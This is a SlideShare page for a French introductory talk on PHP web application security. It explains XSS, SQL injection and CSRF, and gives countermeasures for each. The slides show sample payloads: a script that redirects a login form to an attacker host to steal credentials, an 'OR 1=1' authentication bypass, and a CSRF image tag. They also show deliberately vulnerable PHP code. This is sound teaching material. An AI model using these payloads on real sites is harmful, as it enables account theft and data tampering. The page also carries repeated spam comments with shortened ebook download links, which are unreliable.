Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Introduction à la sécurité des applications web avec php [fr]

6,409 views

Published on

Présentation de la conférence Sécurité web / PHP aux #NWXTECH2 par Maxime Mauchaussée / Wixiweb.
Découvrez les principes de bases de la sécurité PHP : les injections SQL, les failles XSS et CSRF et voyez comment vous en protéger simplement.

Published in: Technology
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (Unlimited) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/qURD } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/qURD } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/qURD } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/qURD } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/qURD } ......................................................................................................................... Download doc Ebook here { https://soo.gd/qURD } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THAT BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://urlzs.com/UABbn } ......................................................................................................................... Download Full EPUB Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... Download Full doc Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... Download PDF EBOOK here { https://urlzs.com/UABbn } ......................................................................................................................... Download EPUB Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... Download doc Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book that can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer that is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story That Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money That the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths that Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THAT BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book that can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer that is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story That Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money That the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths that Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Introduction à la sécurité des applications web avec php [fr]

  1. 1. Introduction à la Sécurité des  Applications Web / PHP  Principes de bases Maxime Mauchaussée  XSS  Injection SQL maxime@wixiweb.fr  CSRF @maximemdotnet http://www.wixiweb.fr @wixiweb   
  2. 2. Plan  Principes de bases de sécurisations  Failles de type XSS  Définition  Exemples / Exploitation  Contre­mesures  Failles de type SQL Injection  Définition  Exemples / Exploitation  Contre­mesures  Failles de type CSRF  Définition  Exemples / Exploitation  Contre­mesures  Conclusion   
  3. 3. Principes de bases  Ne jamais faire confiance aux données ne provenant pas de  votre propre code  Paramètres dURL, cookies, données de formulaire, etc.  API, fichier dimport, base de données, etc.  Variables denvironnement (user agent, referer, host, etc.)  Éviter de permettre la saisie de balises HTML  Lutilisation de la balise <img> doit être extrêmement encadrée  Interdire lutilisation des attributs dangereux tels que « style » et  « onload »  Ne jamais minimiser limportance dune faille  Toutes failles peut potentiellement être un jour exploitée  Corriger le plus rapidement possible toute faille découverte   
  4. 4. Failles de type XSS ­ Définition  XSS : Cross Site Scripting  Le principe est dinjecter des données arbitraires dans un  site web [...] Si ces données arrivent telles quelles dans la page  web transmise au navigateur sans avoir été vérifiées, alors il  existe une faille [Wikipedia]  Injection de code HTML ou Javascript   Le contenu injecté est utilisé pour pièger un utilisateur   
  5. 5. Failles de type XSS – Exemple basique  Exemple de site web banal :   
  6. 6. Failles de type XSS – Exemple basiqueFichier de vue PHP :<form action="recherche.php" method="get"><input type="text" name="q" value="<?php echo $_GET[q]; ?>" /><input type="submit" value="recherche" /></form>Données saisies et envoyées au serveur :"/><script type="text/javascript">alert(faille xss)</script><"HTML compromis retourné par le serveur :<input type="text" name="q" value=""/><scripttype="text/javascript">alert(faille xss)</script><"" />   
  7. 7. Failles de type XSS – Exemple basique  « PAF ! Pastèque ! » :   
  8. 8. Failles de type XSS – Exploitations  Dégradation de limage / la réputation du site  Redirection automatique  Initialisation de téléchargement de fichiers vérolés  Vol didentifiants  Détournement de session (hijacking)  Fixation de session   
  9. 9. Failles de type XSS – Exemples dexploit  Détournement de lattribut « action » du formulaire  dauthentification par injection :"/><script>document.forms[0].action=http://attaquant.fr/owned.php;</script><"  Les utilisateurs enverront leurs identifiants vers le scripts défini  par lattaquant  Possibilité de redirection (parfois transparente) vers la page  légitime   
  10. 10. Failles de type XSS – Contre­mesures  Filtrer / nettoyer les données en entrée :  Toute donnée a un format : longueur, bornes, etc.  filter_var() ou filter_input()  strip_tags() en second choix  Ne pas autoriser la saisie de balises HTML  Et en sortie :  htmlspecialchars()   
  11. 11. Failles de type SQL Injection ­ Définition  Injection SQL  Terme qui désigne linterprétation imprévue dun code SQL  dans une application. Ce code a été introduit par une voie  détournée. [CERTA]   
  12. 12. Failles de type SQL Injection – Exemple  Bypass de lauthentification :   
  13. 13. Failles de type SQL Injection – Exemple  Code PHP :mysql_query("SELECT id, login, profil FROM user WHERE login = " .$_POST[login] . " AND password = " . $_POST[password] .";");  Données saisies dans le champ « login » : OR 1 = 1 --  Interpretation de la requête SQL par PHP :SELECT id, login, profil FROM user WHERE login = OR 1 = 1 --AND password =    
  14. 14. Failles de type SQL Injection ­ Exploitation  Cette technique permet, [...] à un utilisateur malveillant de  modifier la base de données, ou accéder à des informations qui  ne lui sont pas destinées. [CERTA]  Privilege escalation – augmentation de droit daccès  Vols de données  Destruction de données  Injection de code malveillant   
  15. 15. Failles de type SQL Injection – Contre­mesures  addslashes()SELECT id, login, profil FROM user WHERE login = OR 1 = 1 --AND password =  mysql_real_escape_string()  Requêtes préparées  Requêtes préparées > mysql_real_escape_string > addslashes  Ne pas utiliser le compte SQL « root » pour votre application   
  16. 16. Failles de type CSRF ­ Définition  Cross­Site Request Forgery  Injection de requêtes illégitimes par rebond [CERTA]  Attaque provoquant lenvoi de requêtes par la victime, vers un  site vulnérable, à son insu et en son nom. [CERTA]  Nexploite pas forcément labsence de validation   
  17. 17. Failles de type CSRF – Exemple basique  Système de commentaires :   
  18. 18. Failles de type CSRF – Exemple  Un lien est fournit pour supprimer un de ses commentaires :http://sitemalfichu.fr/delete_comment?id=2  Prédiction de lidentifiant du commentaire de la victime par  lattaquant :http://sitemalfichu.fr/delete_comment?id=1  Insertion dune balise image dans un commentaire par  lattaquant :<img src="http://sitemalfichu.fr/delete_comment?id=1" />   Au chargement de la page par la victime, elle supprime son  commentaire   
  19. 19. Failles de type CSRF – Exploitation  Suppression de données : message, compte utilisateur, etc.  Publication de messages : désinformation, spam, virus, etc.  Changement de mot de passe  Changement dadresse email  Triche à des concours ou sondages   
  20. 20. Failles de type CSRF – Contre­mesures  Utiliser la méthode HTTP POST  Bannir lutilisation de $_REQUEST  Mettre en place un système de tokens pour les actions les  plus sensibles  Interdire la possibilité de saisie de balises HTML   
  21. 21. Conclusion  Ne jamais faire confiance aux données ne provenant pas de  votre propre code  Toute donnée a un format : longeur, bornes, volume, etc.  Toujours filtrer / nettoyer ces données en entrée et en sortie  Corriger les failles le plus rapidement possible  La sécurité des applications web ne sarrête pas là :  configuration de PHP, du serveur web, de linfrastructure  réseau, etc.    
  22. 22. Questions ­ Réponses  Exemples de questions si vous navez pas didée :  Comment détecter de telles failles dans mon application ?  Pouvez­vous citer dautres exemples dattaques XSS / CSRF ?  Quelles autres bonne pratiques peut on appliquer pour sécuriser des  application web ?  Quest ce quune « blind sql injection » ?  Où trouvez des informations complémentaires à ce sujet ?  Existe­t­il dautres types de failles ?   
  23. 23. Merci de votre attention :)  Contact :  maxime@wixiweb.fr  https://twitter.com/maximemdotnet  https://identi.ca/maximemdotnet  http://www.wixiweb.fr/   

×